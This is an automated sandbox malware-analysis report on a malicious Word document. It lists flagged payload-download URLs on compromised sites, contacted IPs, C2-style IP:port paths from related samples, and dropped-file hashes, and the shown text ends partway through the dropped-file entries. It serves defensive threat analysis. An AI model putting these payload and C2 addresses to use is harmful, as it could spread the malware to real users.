                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmpfalse
                              		high
                              https://www.bimception.compowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?vepowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://bbjugueteria.com/s6kscx/Z/powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://ocsp.sectigo.com0powershell.exe, 00000005.00000002.2097744742.00000000030F8000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.9powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://bbjugueteria.comhpowershell.exe, 00000005.00000002.2098563599.0000000003AAA000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.9.1powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://armakonarms.com/wp-content/uploads/2020/11/winmark.pngpowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.piriform.c3#powershell.exe, 00000005.00000002.2093673054.0000000000284000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.jspowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://armakonarms.com/brands/powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.piriform.com/powershell.exe, 00000005.00000002.2093673054.0000000000284000.00000004.00000020.sdmpfalse
                                		high
                                https://armakonarms.com/iletisim/powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://armakonarms.com/wp-includes/wlwmanifest.xmlpowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://armakonarms.compowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2109180444.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107856100.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116302224.0000000002327000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125810547.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2136021936.0000000002137000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://silkonbusiness.matrixinfotechsolupowershell.exe, 00000005.00000002.2098563599.0000000003AAA000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                https://armakonarms.com/comments/feed/powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://silkonbusiness.matrixinfotechsolution.compowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://armakonarms.com/wp-content/uploads/2020/11/winmark-100x100.pngpowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=4.9.powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://homecass.com/wp-content/iF/Ppowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://armakonarms.com/urun-kategori/pump-action-2/powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://homecass.com/wp-content/iF/powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://investor.msn.com/rundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmpfalse
                                  		high
                                  https://sectigo.com/CPS0Dpowershell.exe, 00000005.00000002.2097744742.00000000030F8000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=4.9.powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://armakonarms.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.%s.comPApowershell.exe, 00000005.00000002.2094681910.00000000021D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116652511.00000000027F0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		low
                                  http://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2093673054.0000000000284000.00000004.00000020.sdmpfalse
                                    		high
                                    http://armakonarms.com/wp-includes/js/wp-embed.min.js?ver=5.6powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.windows.com/pctv.rundll32.exe, 0000000A.00000002.2135841154.0000000001F50000.00000002.00000001.sdmpfalse
                                      		high
                                      http://alugrama.com.mxpowershell.exe, 00000005.00000002.2098710061.0000000003B7B000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://armakonarms.com/urun-kategori/short-pump-action/powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://investor.msn.comrundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmpfalse
                                        		high
                                        https://armakonarms.com/feed/powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://armakonarms.com/wp-content/themes/neve/assets/css/woocommerce.min.css?ver=2.10.0powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://www.bimception.comhrsZpowershell.exe, 00000005.00000002.2098563599.0000000003AAA000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://armakonarms.com/wp-json/powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://coworkingplus.espowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://api.w.org/powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpfalse
                                          		high
                                          https://armakonarms.com/urun-kategori/semi-auto/powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://armakonarms.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://armakonarms.com/powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://www.bimception.com/wp-admin/sHy5t/powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2109180444.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107856100.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116302224.0000000002327000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125810547.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2136021936.0000000002137000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmpfalse
                                            		high
                                            https://armakonarms.com/wp-content/uploads/2021/01/armakon.pngpowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://armakonarms.com/wp-content/themes/neve/style.min.css?ver=2.10.0powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://gmpg.org/xfn/11powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpfalse
                                              		high
                                              https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000005.00000002.2098563599.0000000003AAA000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098550728.0000000003A8E000.00000004.00000001.sdmpfalse
                                                		high
                                                http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://armakonarms.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2109180444.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107856100.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116302224.0000000002327000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125810547.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2136021936.0000000002137000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000005.00000002.2097744742.00000000030F8000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-stylpowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2094681910.00000000021D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116652511.00000000027F0000.00000002.00000001.sdmpfalse
                                                    		high
                                                    https://armakonarms.com/xmlrpc.php?rsdpowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000005.00000002.2097744742.00000000030F8000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://bbjugueteria.compowershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.9.1powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://armakonarms.com/wp-content/themes/neve/assets/js/build/modern/frontend.js?ver=2.10.0powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=4powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    162.241.60.240
                                                    		unknownUnited States
                                                    		46606UNIFIEDLAYER-AS-1UStrue
                                                    162.241.61.203
                                                    		unknownUnited States
                                                    		46606UNIFIEDLAYER-AS-1UStrue
                                                    195.159.28.230
                                                    		unknownNorway
                                                    		2116ASN-CATCHCOMNOtrue
                                                    162.241.224.176
                                                    		unknownUnited States
                                                    		46606UNIFIEDLAYER-AS-1UStrue
                                                    45.143.97.183
                                                    		unknownTurkey
                                                    		25145TEKNOTEL-ASTeknotelTelekomunikasyonASTRtrue
                                                    104.21.89.78
                                                    		unknownUnited States
                                                    		13335CLOUDFLARENETUStrue
                                                    69.38.130.14
                                                    		unknownUnited States
                                                    		26878TWRS-NYCUStrue
                                                    166.62.10.32
                                                    		unknownUnited States
                                                    		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                    Analysis ID:343551
                                                    Start date:24.01.2021
                                                    Start time:18:02:35
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 8m 24s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:79a2gzs3gkk.doc
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:22
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • GSI enabled (VBA)
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winDOC@36/8@6/8
                                                    EGA Information:
                                                    • Successful, ratio: 93.3%
                                                    HDC Information:
                                                    • Successful, ratio: 31.6% (good quality ratio 29.4%)
                                                    • Quality average: 70.8%
                                                    • Quality standard deviation: 26.8%
                                                    HCA Information:
                                                    • Successful, ratio: 88%
                                                    • Number of executed functions: 35
                                                    • Number of non-executed functions: 1
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .doc
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Found warning dialog
                                                    • Click Ok
                                                    • Attach to Office via COM
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                    • Execution Graph export aborted for target powershell.exe, PID 2452 because it is empty
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    18:03:36API Interceptor1x Sleep call for process: msg.exe modified
                                                    18:03:37API Interceptor64x Sleep call for process: powershell.exe modified
                                                    18:03:53API Interceptor325x Sleep call for process: rundll32.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    162.241.60.240INFO.docGet hashmaliciousBrowse
                                                      195.159.28.230INFO.docGet hashmaliciousBrowse
                                                      • 195.159.28.230:8080/u4vcbkerccn0qjbn6d/1p4m0oqpu4fiqr/mxqkk/
                                                      DKMNT.docGet hashmaliciousBrowse
                                                      • 195.159.28.230:8080/u14g/zkd6myomm2wuro5/q121fslblp4j4u7p7ny/boxgaf0or/u8p9yrywc1amf/
                                                      WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                                      • 195.159.28.230:8080/orsnig0hr2s74h42s/s6f5l/8oomdsfuyoft/ut3wi8ze1lmdcgp5d/zu7j1c9ns/otptuv61n2r997toe/
                                                      file.docGet hashmaliciousBrowse
                                                      • 195.159.28.230:8080/3j8r06xre/8aflom7at/nfsdzovs6zi5xy894/pzjbw/
                                                      Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                                      • 195.159.28.230:8080/n0jv/20kkdc3lp37n1r7yr9l/7fl0uh0jxz/
                                                      162.241.224.176INFO.docGet hashmaliciousBrowse
                                                        45.143.97.183INFO.docGet hashmaliciousBrowse
                                                        • armakonarms.com/wp-includes/fz/
                                                        69.38.130.14INFO.docGet hashmaliciousBrowse
                                                          DOK-012021.docGet hashmaliciousBrowse
                                                            DKMNT.docGet hashmaliciousBrowse
                                                              WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                                                file.docGet hashmaliciousBrowse
                                                                  Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                                                    166.62.10.32INFO.docGet hashmaliciousBrowse
                                                                    • silkonbusiness.matrixinfotechsolution.com/js/q26/
                                                                    MES-2021_01_22-3943960.docGet hashmaliciousBrowse
                                                                    • zippywaytest.toppermaterial.com/wp-admin/wwbJ/
                                                                    Documento 2201 01279.docGet hashmaliciousBrowse
                                                                    • zippywaytest.toppermaterial.com/wp-admin/wwbJ/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    armakonarms.comINFO.docGet hashmaliciousBrowse
                                                                    • 45.143.97.183
                                                                    silkonbusiness.matrixinfotechsolution.comINFO.docGet hashmaliciousBrowse
                                                                    • 166.62.10.32
                                                                    coworkingplus.esINFO.docGet hashmaliciousBrowse
                                                                    • 172.67.138.213
                                                                    bbjugueteria.comINFO.docGet hashmaliciousBrowse
                                                                    • 162.241.60.240

                                                                    ASN

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    UNIFIEDLAYER-AS-1USINFO.docGet hashmaliciousBrowse
                                                                    • 162.241.224.176
                                                                    Electronic form.docGet hashmaliciousBrowse
                                                                    • 192.232.250.227
                                                                    file.docGet hashmaliciousBrowse
                                                                    • 162.241.253.129
                                                                    Payment_[Ref 72630 - joe.blow].htmlGet hashmaliciousBrowse
                                                                    • 50.87.150.0
                                                                    Payment _Arabian Parts Co BSC#U00a9.exeGet hashmaliciousBrowse
                                                                    • 74.220.199.6
                                                                    request_form_1611306935.xlsmGet hashmaliciousBrowse
                                                                    • 162.241.225.18
                                                                    file-2021-7_86628.docGet hashmaliciousBrowse
                                                                    • 162.241.253.129
                                                                    SecuriteInfo.com.Trojan.Dridex.735.31734.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.12612.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.4639.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.24961.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.6647.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.4309.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.30163.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.17436.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.15942.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.27526.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.71.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.23113.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.32551.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    ASN-CATCHCOMNOINFO.docGet hashmaliciousBrowse
                                                                    • 195.159.28.230
                                                                    DKMNT.docGet hashmaliciousBrowse
                                                                    • 195.159.28.230
                                                                    WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                                                    • 195.159.28.230
                                                                    file.docGet hashmaliciousBrowse
                                                                    • 195.159.28.230
                                                                    Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                                                    • 195.159.28.230
                                                                    mssecsvr.exeGet hashmaliciousBrowse
                                                                    • 159.163.124.251
                                                                    windows.staterepositoryupgrade.exeGet hashmaliciousBrowse
                                                                    • 195.159.28.244
                                                                    Check.vbsGet hashmaliciousBrowse
                                                                    • 64.28.27.61
                                                                    HKHX38WttZ.exeGet hashmaliciousBrowse
                                                                    • 195.159.28.230
                                                                    SecuriteInfo.com.Trojan.GenericKD.35280757.18070.dllGet hashmaliciousBrowse
                                                                    • 193.90.12.121
                                                                    Information-822908953.docGet hashmaliciousBrowse
                                                                    • 193.90.12.121
                                                                    ef5ai1p.dllGet hashmaliciousBrowse
                                                                    • 193.90.12.121
                                                                    Documentation.478396766.docGet hashmaliciousBrowse
                                                                    • 193.90.12.121
                                                                    Information-478224510.docGet hashmaliciousBrowse
                                                                    • 193.90.12.121
                                                                    7aKeSIV5Cu.dllGet hashmaliciousBrowse
                                                                    • 193.90.12.121
                                                                    qRMGCk1u96.dllGet hashmaliciousBrowse
                                                                    • 193.90.12.121
                                                                    dVcML4Zl0J.dllGet hashmaliciousBrowse
                                                                    • 193.90.12.121
                                                                    JTWtIx6ADf.dllGet hashmaliciousBrowse
                                                                    • 193.90.12.121
                                                                    yrV5qWOmi3.dllGet hashmaliciousBrowse
                                                                    • 193.90.12.121
                                                                    Invoice_99012_476904.xlsmGet hashmaliciousBrowse
                                                                    • 193.90.12.121
                                                                    UNIFIEDLAYER-AS-1USINFO.docGet hashmaliciousBrowse
                                                                    • 162.241.224.176
                                                                    Electronic form.docGet hashmaliciousBrowse
                                                                    • 192.232.250.227
                                                                    file.docGet hashmaliciousBrowse
                                                                    • 162.241.253.129
                                                                    Payment_[Ref 72630 - joe.blow].htmlGet hashmaliciousBrowse
                                                                    • 50.87.150.0
                                                                    Payment _Arabian Parts Co BSC#U00a9.exeGet hashmaliciousBrowse
                                                                    • 74.220.199.6
                                                                    request_form_1611306935.xlsmGet hashmaliciousBrowse
                                                                    • 162.241.225.18
                                                                    file-2021-7_86628.docGet hashmaliciousBrowse
                                                                    • 162.241.253.129
                                                                    SecuriteInfo.com.Trojan.Dridex.735.31734.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.12612.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.4639.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.24961.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.6647.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.4309.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.30163.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.17436.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.15942.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.27526.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.71.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.23113.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100
                                                                    SecuriteInfo.com.Trojan.Dridex.735.32551.dllGet hashmaliciousBrowse
                                                                    • 198.57.200.100

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0E909297-30AB-4901-9D2A-3CE504568F55}.tmp
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1024
                                                                    Entropy (8bit):0.05390218305374581
                                                                    Encrypted:false
                                                                    SSDEEP:3:ol3lYdn:4Wn
                                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                    Malicious:false
                                                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BE4101D0-AA40-4E61-A4A8-E94B34BC975F}.tmp
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1536
                                                                    Entropy (8bit):1.354223167367391
                                                                    Encrypted:false
                                                                    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlby:IiiiiiiiiifdLloZQc8++lsJe1Mzh
                                                                    MD5:5C1841D0F35E50949B90B42CF085C0A1
                                                                    SHA1:04CFDA027BAD492E3DBF78342F6056AB489B91E1
                                                                    SHA-256:01E73BFFFED6CB9653627CC7B7C29A2A18CABD3853BFC28977DC7C33629C85DC
                                                                    SHA-512:8911BA94418A90870AAE32DC362BC837BB9522A97151DEEEB6FCB6C71351FA1AF86769D7C6E4801A872630AB40509C2234B46FAB722E791A31FF621EDB7698EF
                                                                    Malicious:false
                                                                    Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\79a2gzs3gkk.LNK
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
